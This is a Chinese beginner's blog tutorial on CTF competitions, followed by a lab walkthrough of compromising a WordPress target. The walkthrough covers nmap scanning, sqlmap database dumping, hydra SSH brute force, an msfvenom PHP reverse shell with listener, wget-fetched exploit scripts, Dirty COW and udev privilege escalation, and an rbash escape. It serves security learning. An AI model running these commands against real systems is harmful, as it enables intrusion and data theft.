各种类型网络安全竞赛有哪些 网络安全大赛的简称
本文是对入门学习的一些概念了解和一些常规场景记录
1.CTF(capture the flag)是夺旗赛的意思。
是网络安全技术人员之间进行攻防的比赛。
起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。
(DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行)
有黑客比赛的世界杯的说法。
CTF竞赛已成为安全圈最流行竞赛模式。
国际知名赛事
DEFCON CTF:CTF赛事中的“世界杯”
UCSB iCTF:来自UCSB的面向世界高校的CTF
Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛
Boston Key Party:近年来崛起的在线解题赛
Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF
国内知名赛事
XCTF联赛:是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
(国内,亚洲最大竞赛。清华蓝莲花战队发起)
强网杯:国家级安全比赛,网信办网络安全协调局指导。
红帽杯:广东公安厅,计算机网络安全协会举办
AliCTF:阿里
TCTF:腾讯
BCTF:百度
WCTF:世界大赛邀请制,360
HCTF:杭州电子科技大学信息安全协会
ISCC:全国大学生,北理工
2.竞赛模式:
1.解题模式(jeopardy风险,危险)
通常是线上参与,网络安全技术的题目。
题目包含:逆向,漏洞挖掘和利用,web渗透,密码,取证,隐写,安全编程等类型。
2.攻防模式(attack&defense)
互相攻击防守,挖掘漏洞攻击和修复漏洞防守。
3.混杂模式(mix)
解题和攻防模式结合,典型赛事iCTF。
3.题目类型
3.1.reverse(逆向)
涉及逆向分析能力:软件逆向,破解技术,反汇编和反编译技术。
知识:汇编语言,加解密,反编译工具等。
3.2.Pwn(破解)
pwn发音砰,破解的意思,主要溢出漏洞(堆和栈溢出等)。
涉及对二进制漏洞挖掘和利用能力。
知识:c/c++,OD+IDA,数据结构,操作系统,汇编原理。
(CE(CheatEngine)用来定位数据,OD(ollydbg)用来动态调试,IDA(Interactive Disassembler)用来看代码)
3.3.web(web安全)
web站点漏洞挖掘和利用:XSS,文件包含,代码执行,上传漏洞,sql注入等。
以及数据包的构造和响应,tcp/ip协议。
知识:PHP,JSP, JAVA, Python,TCP/IP,SQL,OWASP TOP 10
3.4.crypto(加解密)
涉及密码学相关技术,加解密技术,编码解码技术。
知识:数论,矩阵,密码学。
3.5.misc(杂项)
安全相关:信息收集,隐写,流量分析,数字取证,编码转换。
知识:隐写术,wireshark流量分析审查等工具使用,编码。
3.6.mobile(移动)
涉及APP漏洞挖掘和利用:iPhone和Android系统,以Android的apk破解为主。
知识:Android
4.学习建议:
可以刷题或者靶机练习,以web安全作为学习入口是不错选择。
XCTF(攻防世界)
Bugku CTF
Jarvis OJ
ctf.show
BUUCTF
CTFHub

词汇简介:POC,EXP,CVE,CVSS
POC(Proof of Concept)
漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在EXP(Exploit)
漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本)0DAY
含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。CVE(Common Vulnerabilities & Exposures)
公共漏洞和暴露,信息安全漏洞公共的名称。
使用一个共同的名字,可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题 。
5.靶机实战:拿下wordpress提权
测试环境:
kali攻击机和WordPress系统的靶机。
WordPress是一款个人博客框架属于内容管理系统(CMS)使用PHP语言和mysql数据库架设。
攻击过程:
信息收集,漏洞挖掘,漏洞利用,权限提升。
5.1.信息收集
包括:主机,ip,端口,服务,操作系统,目录等扫描收集及社工。
1.主机发现工具:arp-scan netdiscover fping等。
arp-scan -l //局域网扫描
netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描
通过mac地址得到厂商。2.端口扫描工具:nmap
-A:全面探测(aggressive(进攻性)) -sS:SYN扫描(半连接) -sV:显示版本 -v:显示vebose详细过程
-p-:全端口(1-65535) -T4:延迟级别,放弃超时10ms
nmap -sS -sV -v -p- -T4 192.168.12.1
nmap -A ip
nmap -A -sS -sV -v -p- -T4 192.168.12.1常见端口和服务:
22:ssh 25:smtp 80:http 111:RPCINFO服务 443:HTTPS服务
624:PRC 3306:MYSQL3.信息收集目标就是威胁建模
(简单来说就是猜测服务可能存在攻击方式和漏洞)
对于web服务主要收集:服务和系统的名称和版本。
可以利用谷歌浏览器Wappalyzer插件收集:系统和服务的版本信息
WordPress版本,操作系统,数据库类型,PHP版本web地址的参数或者表单验证是否可sql注入,
一般首页是没有参数的,选择注册页或者可传参数的页面
比如xx?id=1
后面加个冒号:xxx?id=1'
后面加 and 1=1 后者and 1=2:id=1 and 1=1 或者id=1 and 1=2
and sleep(5)根据响应页面的内容对比判断是否存在注入点。
一般使用工具sqlmap更方便ssh尝试弱口令爆破
工具:九头蛇 美杜莎4.目录扫描:dirb,dirbuster,gobuster,御剑等工具。nikto。
对于web目录扫描是关键步骤,甚至首步骤。
作用:敏感目录和敏感文件可能泄露(管理页面,遗留文件)。
发现管理后台,数据库管理页面。
5.2.漏洞挖掘
几种方式:
1.对于管理后台尝试:
弱口令(默认密码,常用密码),
暴力破解(工具:burp爆破,PHPmyadmin爆破)。
比如phpmyadmin(数据库网页管理工具的主页)2.链接的参数注入
工具:sqlmap参数:-u:url --dbs:爆破数据库 -D:指定数据库 --tables:爆破数据表 -T:指定表 --columns:爆破字段 -C:指定字段(可多个) --dump :脱库
sql注入检测:sqlmap -u "http://xxx?id=1"
得到数据库,web服务器,操作系统类型和版本以及具体库
sql注入检测:sqlmap -u "http://xxx?id=1" --dbs
得到哪些库
sqlmap -u "xxx?id=1" --dbs -D xx --tables
得到爆破xx库的表
sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns
得到爆破的字段
sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump
得到爆破字段的内容有时需要cookie(登陆后)才能sqlmap扫描参数:
获取cookie:浏览器开发者网络查看或者控制台(输入document.cookie获取)
sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs通过爆破可能得到账号和密码,如果服务支持ssh,可以尝试连接
>ssh xx用户@ipxxxx
>密码xxx
(制作密码字典工具以及破解:crunch ;hydra 。
比如:crunch 8 8 -t admin%%@@ -o dic.txt //8 8:最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件
暴力破解ssh:
hydra -l guest -P dic.txt xx.xx.ip ssh
3.网页前端源码查看
是否只是前端验证。4.nikto可对web服务器全面漏洞扫描:服务器cgi和项目及配置等
cgi通用网关接口:网页原本是静态的,通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页,类似servelet。
有时候指服务器,有时候 指cgi语言。
nikto -h http://xxx
得到一些敏感目录和文件,比如源码b备份,sql等
分析源码获得漏洞,获取管理员账号等
拿到网站管理员权限:密码破解获得数据库管理权限以及后台管理员
5.3.漏洞利用
1.利用MSF生成反弹shell(木马)
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php
生成php网页木马,让目标连接自己主机
kali自带php马:/usr/share/webshells/php/php-reverse-sell.php2.上传马
将马页面放到php执行目录,或者写入可执行某个页面。3.监听原先木马设置端口以建立链接
几种方式:
1)netcat工具:类似工具:中国菜刀
nc -nlvp 4444
2)msf
msf>use exploit/multi/handler
>set playload php/meterpreter_reverse_tcp
>set lhost ip
>exploit
执行后会形成一个会话session,ctr+c可退出,
输入:session 1进入会话:
meterpreter>linux查看监听:netstat -tunlp4.得到shell
访问马页面,监听程序得到反弹shell.
此时这个shell是web服务器的权限也就是Apache服务器权限。
whoami ;查看当前权限
uname -a : 查看linux系统内核版本如果使用msf监听那么执行exploit,连接建立后会得到shell
meterpreter>
输入:sysinfo 查看系统版本信息,
输入:shell 生成交互shell
还可以切换不同样式的shell:交互更友好:
python -c 'import pty;pty.spawn("/bin/bash")'
(common shell和 meterpreter shell区分
有些连接得到是common shell 使用ctr+z
然后:y 让当前shell隐藏回到msf界面,
使用session -l :查看所有会话shell,每个会话有个id。
session -u 某id:将某会话从common变成meterpreter
session -i 某id :进入某id会话
)5.权限提升,获取root权限
1).漏洞脏牛(dirty cow,CVE-2016-5195)对Linux内核>=2.6.22版本(2007年发布)本地提权,直到2016.10才修复。
原理:内核的内存子系统在处理写入复制时(copy-on-write)产生了竞争条件,利用执行顺序异常,对只读内存映射进行写入,获得root权限。
github官方提供exp
2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞)
searchsploit linux udev (漏洞库搜索udev漏洞的exp)
/usr/share/exploitdb/platforms/linux/local/8478.shexp在靶机执行需要先获取执行文件,还的添加执行权限。
提供一个传送地址的几种方式:
1).sh放在/tmp下,并执行:python -m SimpleHTTPServer 80
目标主机获取:wget http://xx/xx.sh
查看进程:cat /proc/net/netlink
在特定进程执行udev思路:知道漏洞,找到漏洞exp。
补充:低权限rbash提升(绕过)
当用guest用户登陆系统:ssh gust@xx.xx.xx.ip
得到的shell可能权限非常低很多命令不能使用
当前是rbash解析命令:
echo $PATH:查看当前path。
输出:/home/guest/prog
输入命令会先到path目录下查找,存在才会直接执行,否则需要输入全路径才行执行。echo $PATH/*:查看可以直接执行的命令
输出:/home/guest/prog/vi
即表面可以直接执行vi。
进入vi:
:!/bin/bash //!在命令前面表示调用外部命令,在命令后面(wq!)表示强制执行。
执行后命令使用bash来解析。
(sudo以管理员运行,su切换用户,sudo su 切换到管理员)
执行sudo su 显示找不到命令sudo
某目录查找命令:
ls -la /bin/sudo
ls -la /sbin/sudo
ls -la /usr/bin/sudo //确定sudo位置
修改环境变量:
export PATH=$PATH:/usr/bin/sudo
查看当前path:
echo $paht
查找将su命令路径添加到环境:
ls -la /bin/su //确认位置
修改path:
export PATH=$PATH:/bin/su
接下可以执行:sudo su(需要有密码)
5.4.如何防御:
登录后复制
1.关闭多余端口,最小原则。
2.使用cms等系统,修改默认后台路径。
3.数据管理PHPmyadmin修改默认路径和密码。
4.升级操作系统版本,及时打补丁修复漏洞。
5.关注最新漏洞情报,提升安全运维响应能力。
网络安全学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:

需要网络安全学习路线和视频教程的可以在评论区留言哦~
最后
- 如果你确实想自学的话,我可以把我自己整理收藏的这些教程分享给你,里面不仅有web安全,还有渗透测试等等内容,包含电子书、面试题、pdf文档、视频以及相关的课件笔记,我都已经学过了,都可以免费分享给大家!
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。
黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)


结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失

相关文章:
各种类型网络安全竞赛有哪些 网络安全大赛的简称
本文是对入门学习的一些概念了解和一些常规场景记录 1.CTF(capture the flag)是夺旗赛的意思。 是网络安全技术人员之间进行攻防的比赛。 起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。 (DEFCON极客大会诞生1993,…...
浅谈人工智能与深度学习的应用案例研究
人工智能与深度学习的应用案例研究 人工智能(AI)与深度学习技术正以惊人的速度渗透到社会生活的各个领域,从医疗健康到艺术创作,从金融风控到城市治理,其应用案例不断突破传统边界。以下是近年来具有代表性的六大应用方向及具体案例: 一、医疗健康:精准诊断与药物研发 医…...
vue2版本elementUI的table分页实现多选逻辑
1. 需求 我们需要在表格页上实现多选要求,该表格支持分页逻辑。 2. 认识属性 表格属性 参数说明类型可选值默认值data显示的数据array——row-key行数据的 Key,用来优化 Table 的渲染;在使用 reserve-selection 功能与显示树形数据时&…...
AI数字人技术源码开发分享:革新短视频营销策略
集星幻影的AI数字人分身系统是一款融合了先进人工智能技术的综合性短视频营销解决方案。该系统整合了形象克隆、声音克隆、AI数字人分身生成、智能剪辑及文案创作等功能,旨在为用户打造虚拟人物资产并提供AI驱动的多模态交互服务。以下是该系统的主要功能概述&#…...
实验环境搭建集锦(docker linux ros2+强化学习环境+linux上单片机串口调试)
为了记住一些实验环境配置开的文章,边配置边记,免得之后忘了。 Docker环境搭建 yay -S docker //下载docker docker info //查看docker配置 sudo systemctl start docker //系统配置打开docker sudo systemctl enable docker //系统配置后台开启d…...
sql调优之数据库开发规范
数据库 数据库开发规范 也可用于PostgreSQL以及兼容PG的数据库 通用命名规则 【强制】 本规则适用于所有对象名,包括:库名、表名、列名、函数名、视图名、序列号名、别名等。 【强制】 对象名务必只使用小写字母,下划线,数字&…...
《Effective Objective-C》阅读笔记(上)
目录 高质量iOS之熟悉OC 了解OC语言的起源 在类的头文件中尽量少引入其他头文件 多用字面语法,少用与之等价的方法 字面数值 字面量数组 字面量字典 局限性 多用类型常量,少用#define预处理指令 用枚举表示状态、选项、状态码 高质量iOS之对象…...
ClkLog里程碑:荣获2024上海开源技术应用创新竞赛三等奖
2024年10月,ClkLog团队参加了由上海计算机软件技术开发中心、上海开源信息技术协会联合承办的2024上海数智融合“智慧工匠”选树、“领军先锋”评选活动——开源技术应用创新竞赛。我们不仅成功晋级决赛,还荣获了三等奖!这一成就不仅是对ClkL…...
【数据结构进阶】哈希表
🌟🌟作者主页:ephemerals__ 🌟🌟所属专栏:数据结构 目录 前言 一、哈希表的概念 二、哈希函数的实现方法 1. 直接定址法 2. 除留余数法 三、哈希冲突 1. 开放定址法(闭散列࿰…...
STM32内存五区及堆栈空间大小设置(启动文件浅析)
前言 嘿,朋友们!今天咱们来聊聊STM32的内存五区和堆栈空间大小设置。这可是嵌入式开发里的“必修课”,要是没整明白,程序说不定就“翻车”了。别担心,我这就带你一步步搞懂这事儿,让你轻松上手,…...
微信小程序调用火山方舟(字节跳动火山引擎)中的DeepSeek大模型
微信小程序的轻量化特性与DeepSeek大模型的AI能力结合,可快速构建智能问答、内容生成等场景化服务。通过火山方舟平台提供的标准化接口,开发者无需深入算法细节即可调用模型能力。 一、注册火山引擎账号,创建API Key和model(接入…...
(八)Java-Collection
一、Collection接口 1.特点 Collection实现子类可以存放多个元素,每个元素可以是Object; 有些Collection的实现类,可以存放重复的元素,有些不可以; 有些Collection的实现类,有些是有序的(Li…...
从单片机的启动说起一个单片机到点灯发生了什么下——使用GPIO点一个灯
目录 前言 HAL库对GPIO的抽象 核心分析:HAL_GPIO_Init 前言 我们终于到达了熟悉的地方,对GPIO的初始化。经过漫长的铺垫,我们终于历经千辛万苦,来到了这里。关于GPIO的八种模式等更加详细的细节,由于只是点个灯&am…...
C++ | 哈希表
前言 💓 个人主页:普通young man-CSDN博客 ⏩ 文章专栏:C_普通young man的博客-CSDN博客 ⏩ 本人giee: 普通小青年 (pu-tong-young-man) - Gitee.com 若有问题 评论区见📝 🎉欢迎大家点赞👍收藏⭐文章 —…...
leetcode_动态规划/递归 70. 爬楼梯
70. 爬楼梯 假设你正在爬楼梯。需要 n 阶你才能到达楼顶。 每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? 思路: 考虑: 假设现在已经爬到了某一阶台阶,那是如何到达这里的呢?可能是从前一阶台阶爬上来的&am…...
基于Rook的Ceph云原生存储部署与实践指南(上)
#作者:任少近 文章目录 1 Ceph环境准备2 rook部署ceph群集2.1 Rook 帮助地址2.2 安装ceph2.3 获取csi镜像2.4 Master参加到osd2.5 设置默认存储 3 Rook部署云原生RBD块存储3.1 部署storageclass资源3.2 部署WordPress使用RBD3.3 WordPress访问 4 Rook部署云原生RGW…...
C++ Qt常见面试题(4):Qt事件过滤器
在 Qt 中,事件过滤器(Event Filter)提供了一种机制,可以拦截并处理对象的事件(如鼠标事件、键盘事件等),在事件到达目标对象之前对其进行预处理。事件过滤器通常用于以下场景: 捕获和处理特定的事件(如鼠标点击、按键等);对事件进行筛选或修改;实现全局的事件监听功…...
regionserver实例僵住问题分析
问题现象: 应用提交超时,发现regionserver实例异常。hbase原生页面这个实例dead,业务连接到这个rs的进程超时8个regionserver实例。 D08在18:30分后显示warning,应用提交任务到这个rs节点超时,hbase控制台不显示d08的rs信息了。19:30在页面停止rs实例失败,然后kill进程…...
服务器离线部署DeepSeek
目标 本次部署的目标是在本地服务器上部署DeepSeek。但是该服务不能连接外网,因此只能使用离线部署的方式。为了一次完成部署。现在云服务器上进行尝试。 云服务器部署尝试 云服务器配置 CentOS72080Ti 11GB 安装准备 1、上传iso并配置为本地yum源 安装前先将…...
QT mac系统下qml实现的菜单栏,标准快捷键Delete无作用或失灵的处理
一.在mac系统下,QT官方提供的删除快捷键无作用。 1.下面这一段代码,最后一个menuItem采用的是QT自带的标准快捷键,但是在使用的过程中,快捷键无响应。大家可以将代码带入简单的demo尝试一下: MenuBar {id: rootMenu {id: editMenutitle: TransText.titleBar_EditMenuItem…...
IDEA运行Tomcat出现乱码问题解决汇总
最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…...
网络六边形受到攻击
大家读完觉得有帮助记得关注和点赞!!! 抽象 现代智能交通系统 (ITS) 的一个关键要求是能够以安全、可靠和匿名的方式从互联车辆和移动设备收集地理参考数据。Nexagon 协议建立在 IETF 定位器/ID 分离协议 (…...
基于FPGA的PID算法学习———实现PID比例控制算法
基于FPGA的PID算法学习 前言一、PID算法分析二、PID仿真分析1. PID代码2.PI代码3.P代码4.顶层5.测试文件6.仿真波形 总结 前言 学习内容:参考网站: PID算法控制 PID即:Proportional(比例)、Integral(积分&…...
三维GIS开发cesium智慧地铁教程(5)Cesium相机控制
一、环境搭建 <script src"../cesium1.99/Build/Cesium/Cesium.js"></script> <link rel"stylesheet" href"../cesium1.99/Build/Cesium/Widgets/widgets.css"> 关键配置点: 路径验证:确保相对路径.…...
visual studio 2022更改主题为深色
visual studio 2022更改主题为深色 点击visual studio 上方的 工具-> 选项 在选项窗口中,选择 环境 -> 常规 ,将其中的颜色主题改成深色 点击确定,更改完成...
UDP(Echoserver)
网络命令 Ping 命令 检测网络是否连通 使用方法: ping -c 次数 网址ping -c 3 www.baidu.comnetstat 命令 netstat 是一个用来查看网络状态的重要工具. 语法:netstat [选项] 功能:查看网络状态 常用选项: n 拒绝显示别名&#…...
macOS多出来了:Google云端硬盘、YouTube、表格、幻灯片、Gmail、Google文档等应用
文章目录 问题现象问题原因解决办法 问题现象 macOS启动台(Launchpad)多出来了:Google云端硬盘、YouTube、表格、幻灯片、Gmail、Google文档等应用。 问题原因 很明显,都是Google家的办公全家桶。这些应用并不是通过独立安装的…...
C# SqlSugar:依赖注入与仓储模式实践
C# SqlSugar:依赖注入与仓储模式实践 在 C# 的应用开发中,数据库操作是必不可少的环节。为了让数据访问层更加简洁、高效且易于维护,许多开发者会选择成熟的 ORM(对象关系映射)框架,SqlSugar 就是其中备受…...
select、poll、epoll 与 Reactor 模式
在高并发网络编程领域,高效处理大量连接和 I/O 事件是系统性能的关键。select、poll、epoll 作为 I/O 多路复用技术的代表,以及基于它们实现的 Reactor 模式,为开发者提供了强大的工具。本文将深入探讨这些技术的底层原理、优缺点。 一、I…...
今日学习:Spring线程池|并发修改异常|链路丢失|登录续期|VIP过期策略|数值类缓存
文章目录 优雅版线程池ThreadPoolTaskExecutor和ThreadPoolTaskExecutor的装饰器并发修改异常并发修改异常简介实现机制设计原因及意义 使用线程池造成的链路丢失问题线程池导致的链路丢失问题发生原因 常见解决方法更好的解决方法设计精妙之处 登录续期登录续期常见实现方式特…...
